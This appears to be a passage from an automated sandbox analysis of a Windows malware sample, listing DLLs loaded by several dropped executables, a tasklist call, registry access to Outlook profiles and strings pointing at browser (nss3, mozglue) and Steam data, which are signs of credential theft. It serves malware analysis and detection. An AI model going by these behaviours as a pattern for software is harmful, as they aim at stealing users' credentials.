Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: wshext.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: esdsip.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: apphelp.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: winmm.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: wldp.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: propsys.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: profapi.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: edputil.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: urlmon.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: iertutil.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: srvcli.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: netutils.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: sspicli.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: wintypes.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: appresolver.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: slc.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: userenv.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: sppc.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: pcacli.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: mpr.dll
Source: C:\Users\user\1000003002\ead6a72944.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Google Chrome.lnk.26.dr	LNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe
Source: Google Drive.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb61252224y source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.inisP~ source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbes source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831BSOFTWARE\WOW6432Node\Valve\Steams source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
